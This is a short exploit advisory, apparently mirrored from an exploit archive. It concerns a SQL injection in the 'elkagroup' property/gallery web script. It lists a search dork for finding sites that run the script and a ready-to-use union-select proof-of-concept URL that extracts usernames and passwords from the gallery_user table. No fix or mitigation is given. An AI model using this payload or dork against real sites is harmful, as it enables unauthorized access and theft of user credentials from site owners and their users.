id: 10501
date: 12/30/2009
title: elkagroup (pid ) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

===================================================
elkagroup (pid ) Remote SQL Injection Vulnerability
===================================================

||| script : http://www.elkapax.com &  http://www.elkagroup.com
 
||| DorK   : "Powered by : elkagroup.com<http://elkagroup.com>"
 
POC
________
 
http://[server]/[path]/property.php?cid=12&uid=0&pid=-168+union+select+1,username,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17+from+gallery_user--



#  0day.today [2023-03-24]  #